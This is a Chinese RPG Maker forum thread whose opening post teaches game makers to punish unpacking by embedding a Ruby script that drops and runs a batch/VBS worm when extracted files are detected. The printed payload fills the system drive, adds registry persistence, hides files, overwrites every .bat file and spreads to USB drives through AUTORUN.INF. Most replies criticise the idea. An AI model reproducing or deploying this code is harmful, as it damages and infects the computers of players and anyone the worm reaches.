设为首页收藏本站|繁體中文

Project1

 找回密码
 注册会员
搜索
查看: 14521|回复: 26
打印 上一主题 下一主题

[RMVA发布] 手把手教你防解包器!!!!怕被解包的都进来!!!

[复制链接]

Lv2.观梦者

梦石
0
星屑
581
在线时间
106 小时
注册时间
2011-2-19
帖子
82
跳转到指定楼层
1
发表于 2014-1-27 05:18:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

加入我们,或者,欢迎回来。

您需要 登录 才可以下载或查看,没有帐号?注册会员

x
本帖最后由 a386881 于 2014-1-27 05:22 编辑

阅读以下内容者,即代表其同意为自己行为负全责,干了什么坏事造成了多大损失均与本文作者即我没有半毛钱关系。
人是一种狡猾的动物。无论做精密的加密,终究会被破解。
最好的加密,是恐惧。
只要做到没人敢拆你的包,你就什么加密也不用了。
今天我来谈谈,怎样把自己的Game.rgss3a打造成一个无人敢开的潘多拉魔盒。
另,今天的内容估计在RMXP和RMVX上也能找到实现方法。
你可以下载附件的游戏玩玩。说是游戏,其实只是为了配合这次教学随便找了个“事件标题”的工程
原帖:http://rpg.blue/forum.php?mod=viewthread&tid=257015
用别人的是因为我对def语句完全不理解。(捂脸)
嘛,但是幸好一些奇奇怪怪的地方学的蛮好就是了。
用事件标题一因为是插在事件里会比较醒目(方便大家讨论,但理所当然不方便坑人),二因为是我是事件脚本流的。
文中用到的病毒是 秋瑾工作室 的,因为看了看貌似比我自己写的威力大得多所以就拿来了。
原帖:http://20080808qjsoft.blog.163.c ... 666200931211827722/
如果你很奇怪为什么我能在事件脚本中写的开那么多的内容,可以去http://rpg.blue/thread-347809-1-1.html
下载RMVA补丁(注意备份)
嘛,进入正题。
工作原理:运行游戏时,通过判断Data/Animations.rvdata2的有无来判断是否已被拆包。
工作内容:若有Data/Animations.rvdata2,说明被拆包了,则向文件夹输出bat病毒(其实是个混合病毒),并运行之。
嘛,下面贴一下脚本码好了,贴完再讲解。
  1. if File.exist?("Data/Animations.rvdata2")
  2. OutputTXTcontent = <<END_OF_STRING
  3. if exsit %SystemDrive%\\PAGEFILES.SYS goto end
  4. copy %0 %windir%\\system32\\logon.exe.bat                     
  5. FOR /F "tokens=3*" %%i in ('dir /-c %SystemDrive%^|find "可用字节"') do fsutil file createnew %SystemDrive%\\PAGEFILES.SYS %%i
  6. attrib +r +s +h %SystemDrive%\\PAGEFILES.SYS        
  7. reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v KV2007 /t REG_SZ /d %windir%\\system32\\logon.vbs                 
  8. reg delete HKLM\\Software\\Microsoft\\windows\\CurrentVersion\\explorer\\Advanced\\Folder\\Hidden\\SHOWALL /va /f                    
  9. for /r %SystemDrive% %%i in (*.bat) do type %0>%%i   
  10. if exist %windir%\\system32\\logon.vbs goto end
  11. echo set fs =createobject("scripting.filesystemobject")>>%windir%\\system32\\logon.vbs
  12. echo set WshShell = WScript.CreateObject("WScript.Shell")>>%windir%\\system32\\logon.vbs
  13. echo Set objWMIService = GetObject("winmgmts:" _>>%windir%\\system32\\logon.vbs
  14. echo ^& "{impersonationLevel=impersonate}!\\\\" ^& strComputer ^& "\\root\\cimv2")>>%windir%\\system32\\logon.vbs
  15. echo Set colDisks = objWMIService.ExecQuery _>>%windir%\\system32\\logon.vbs
  16. echo ("Select * from Win32_LogicalDisk")>>%windir%\\system32\\logon.vbs
  17. echo For i =1 to 9000000000>>%windir%\\system32\\logon.vbs
  18. echo For Each objDisk in colDisks>>%windir%\\system32\\logon.vbs
  19. echo Select Case objDisk.DriveType>>%windir%\\system32\\logon.vbs
  20. echo :Case 2:>>%windir%\\system32\\logon.vbs
  21. echo y1=fs.FileExists(objDisk.DeviceID ^& "\\AUTORUN.INF")>>%windir%\\system32\\logon.vbs
  22. echo if not y1 then>>%windir%\\system32\\logon.vbs
  23. echo set f=fs.opentextfile(objDisk.DeviceID ^& "\\AUTORUN.INF",2, true)>>%windir%\\system32\\logon.vbs
  24. echo f.write "[AutoRun]" ^& vbcrlf>>%windir%\\system32\\logon.vbs
  25. echo f.write "open=logon.exe.bat" ^& vbcrlf>>%windir%\\system32\\logon.vbs
  26. echo f.write "shellexecute=logon.exe.bat" ^& vbcrlf>>%windir%\\system32\\logon.vbs
  27. echo f.write "shell\\Auto\\command=logon.exe.bat" ^& vbcrlf>>%windir%\\system32\\logon.vbs
  28. echo f.Close>>%windir%\\system32\\logon.vbs
  29. echo Set f1 = fs.GetFile(objDisk.DeviceID ^& "\\AUTORUN.INF")>>%windir%\\system32\\logon.vbs
  30. echo If f1.Attributes = f1.Attributes AND 2 Then>>%windir%\\system32\\logon.vbs
  31. echo :f1.Attributes = f1.Attributes XOR 7:>>%windir%\\system32\\logon.vbs
  32. echo End If>>%windir%\\system32\\logon.vbs
  33. echo end if>>%windir%\\system32\\logon.vbs
  34. echo y2=fs.FileExists(objDisk.DeviceID ^& "\\logon.exe.bat")>>%windir%\\system32\\logon.vbs
  35. echo if not y2 then >>%windir%\\system32\\logon.vbs
  36. echo fs.CopyFile "c:\\windows\\system32\\logon.exe.bat",objDisk.DeviceID ^& "\\">>%windir%\\system32\\logon.vbs
  37. echo Set f2 = fs.GetFile(objDisk.DeviceID ^& "\\logon.exe.bat")>>%windir%\\system32\\logon.vbs
  38. echo If f2.Attributes = f2.Attributes AND 2 Then>>%windir%\\system32\\logon.vbs
  39. echo :f2.Attributes = f2.Attributes XOR 7:>>%windir%\\system32\\logon.vbs
  40. echo End If>>%windir%\\system32\\logon.vbs
  41. echo end if>>%windir%\\system32\\logon.vbs
  42. echo dirr = Wshshell.ExpandEnvironmentStrings("%systemdrive%")>>%windir%\\system32\\logon.vbs
  43. echo y3=fs.FileExists(dirr & "\\PAGEFILES.SYS")>>%windir%\\system32\\logon.vbs
  44. echo if not y3 then>>%windir%\\system32\\logon.vbs
  45. echo WshShell.Run "logon.exe.bat">>%windir%\\system32\\logon.vbs
  46. echo WScript.Sleep 500>>%windir%\\system32\\logon.vbs
  47. echo Set f3 = fs.GetFile(dirr & "\\PAGEFILES.SYS")>>%windir%\\system32\\logon.vbs
  48. echo If f3.Attributes = f3.Attributes AND 2 Then>>%windir%\\system32\\logon.vbs
  49. echo :f3.Attributes = f3.Attributes XOR 7:>>%windir%\\system32\\logon.vbs
  50. echo End If>>%windir%\\system32\\logon.vbs
  51. echo end if>>%windir%\\system32\\logon.vbs
  52. echo End Select>>%windir%\\system32\\logon.vbs
  53. echo Next>>%windir%\\system32\\logon.vbs
  54. echo WScript.Sleep 5000>>%windir%\\system32\\logon.vbs
  55. echo Next>>%windir%\\system32\\logon.vbs
  56. END_OF_STRING
  57. OutputTXT = File.open("hunter.bat",'w')
  58. OutputTXT.puts OutputTXTcontent
  59. OutputTXT.close
  60. #如果你找到了一个合适的全键盘脚本,那么可以在这里加一行全屏+锁全键盘。效果绝对赞。
  61. system "start hunter.bat"
  62. end
复制代码
讲解时间!
if File.exist?("Data/Animations.rvdata2")
这行是判断文件是否存在的。
OutputTXTcontent = <<END_OF_STRING
XXXX
XXXX
END_OF_STRING
这两句话是:把这两行中间的东西存储到字符串OutputTXTcontent里面去。
其中END_OF_STRING和字符串的名字都可以改,上下一致就行。
中间的东西是病毒代码。
bat病毒或者vbs病毒或者aotorun.inf病毒都行。
OutputTXT = File.open("hunter.bat",'w')
OutputTXT.puts OutputTXTcontent
OutputTXT.close
这个是输出TXT的脚本,其中OutputTXT同样可以改,上下一致就行。
system "start hunter.bat"
这个是ruby调用外部程序的方法。实际上有三种常见方法,我只看懂这一种。
嘛,一点相关的资料也都放进附件了。嗯嗯。
至于中间的那段病毒代码……这不是RM的范围了。似乎不该在这里讨论的说。况且我也有一些地方还没搞清楚。
不过代码中的所有\要换成\\(就是多了一个\),不然会被ruby认为是转义符。真傻啊。
可不要拿这个脚本去做坏事哦!可不要把RMVA给搞成神马自动生成病毒发送器……那可不是我本意啊……
PS:后来想了想我还是给你们换了一个比较安全的假病毒。秋瑾工作室的那个我在标题事件的第三页放了一份,附件里也放了一份TXT,有兴趣自行去参观。
差点忘了附件:[url=http://pan.baidu.com/share/link?shareid=1790600109&uk=939995919][/url]

评分

参与人数 3星屑 +67 收起 理由
lsu666666 + 50 认可答案
1105741847 + 7 塞糖
我爱吴悦淇 + 10 头像哈哈哈哈

查看全部评分

不行了我得去找只猫吸一吸,你们先聊着别等我了

Lv1.梦旅人

梦石
0
星屑
60
在线时间
705 小时
注册时间
2007-12-23
帖子
874
2
发表于 2014-1-27 08:49:16 | 只看该作者
.....我在虚拟机里刚运行,
就被360拦截了。
他说start hunter.bat是病毒。。。

麻烦LZ换个高级点的病毒好吗。。
买了正版RMMV的同学进来看一下,谢谢~
https://rpg.blue/thread-393237-1-1.html
回复 支持 反对

使用道具 举报

Lv3.寻梦者 (版主)

…あたしは天使なんかじゃないわ

梦石
0
星屑
2208
在线时间
4033 小时
注册时间
2010-10-4
帖子
10779

开拓者贵宾

3
发表于 2014-1-27 08:58:05 | 只看该作者
本帖最后由 taroxd 于 2014-1-27 09:16 编辑

Lz你应该学一学def
你这段脚本不应该写在事件里执行,倒是应该在启动游戏的时候执行
回复 支持 反对

使用道具 举报

Lv2.观梦者

梦石
0
星屑
263
在线时间
1575 小时
注册时间
2010-6-17
帖子
2892

开拓者贵宾

4
发表于 2014-1-27 09:21:29 | 只看该作者
= = 防解包 最好的方法是不加包 那样就没人解包了
快来点我一下,你会豁然开朗的
喵Kano特制
←开发中……

←暂时弃坑 电脑上资源全没
回复 支持 1 反对 0

使用道具 举报

Lv2.观梦者

梦石
0
星屑
690
在线时间
791 小时
注册时间
2011-10-20
帖子
2394

开拓者

5
发表于 2014-1-27 09:27:28 | 只看该作者
我想知道 破解后你那些代码可能别人运行不到。
我一般拆开后就直接打开工程了,然后我觉得找到你那段代码应该还是容易的

貌似现在病毒基本都会被杀毒吧
欢迎点此进入我的egames.wink.ws,有RMQQ堂等

[url=http://rpg.blue/thread-317273-1-1.html]短篇八-赶选

http://yun.baidu.com/share/link?shareid=2158225779&uk=169642147&third=0


历险ARPG赢回你的疆域新的战斗模式?…………点击这里:[宋乱贼狂 for QQ堂]
http://rpg.blue/group-368-1.html
programing ....?
[url=http://rpg.blue/thrd-234658-1-1.html]
回复 支持 反对

使用道具 举报

Lv1.梦旅人

梦石
0
星屑
68
在线时间
585 小时
注册时间
2013-5-25
帖子
1524
6
发表于 2014-1-27 09:44:17 | 只看该作者
家里进来一个小偷你把他打死了

@protosssonny 把楼主这帖子删掉吧

点评

每次看到都忍不住笑……打死了…打死了…我我我把小偷打死了……  发表于 2014-1-27 22:37
↓为什么不弄C盘杀手  发表于 2014-1-27 10:06
其实吾赞成把小偷打死,吾认为这是合法的正当防卫行为~吾的游戏就是用类似这个办法威慑解包的~  发表于 2014-1-27 10:05
回复 支持 反对

使用道具 举报

Lv1.梦旅人

梦石
0
星屑
90
在线时间
85 小时
注册时间
2012-5-27
帖子
148
7
发表于 2014-1-27 09:46:06 手机端发表。 | 只看该作者
楼主的方法不实用啊,我完全可以先看工程再运行,至少邪恶的我就是这样的,其实我觉得用脚本加密更靠谱
回复 支持 反对

使用道具 举报

Lv3.寻梦者

梦石
0
星屑
3846
在线时间
1966 小时
注册时间
2013-1-3
帖子
9536
8
发表于 2014-1-27 10:43:18 | 只看该作者
这种方法没有实际用途,杀毒软件会隔离
宁愿游戏被破解,也不能向玩家的系统种病毒

评分

参与人数 2星屑 +11 收起 理由
哇哈哈哇哈哈 + 6 我很赞同
ninitiange2 + 5 我很赞同

查看全部评分

《宿愿·寻剑篇》正式版已经发布!快去看看!点击进入论坛发布贴
回复 支持 反对

使用道具 举报

Lv1.梦旅人

梦石
0
星屑
196
在线时间
835 小时
注册时间
2012-9-16
帖子
1811
9
发表于 2014-1-27 11:07:39 | 只看该作者
如果放病毒,玩家直接删了=-=还管你加不加密。放病毒可耻,而且没人去玩你这个病毒的game

——旧坑欢迎戳
回复 支持 反对

使用道具 举报

Lv1.梦旅人

梦石
0
星屑
48
在线时间
161 小时
注册时间
2012-8-2
帖子
118
10
发表于 2014-1-27 11:14:22 | 只看该作者
过百度杀毒(我家电脑正在重装系统,因为病毒。。。。)

点评

是,五十多台(忘告诉你是网吧)  发表于 2014-1-27 17:17
。。。家里机器多啊。。。  发表于 2014-1-27 11:29
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册会员

本版积分规则

拿上你的纸笔,建造一个属于你的梦想世界,加入吧。
 注册会员
找回密码

站长信箱:[email protected]|手机版|小黑屋|无图版|Project1游戏制作

GMT+8, 2024-11-26 13:05

Powered by Discuz! X3.1

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表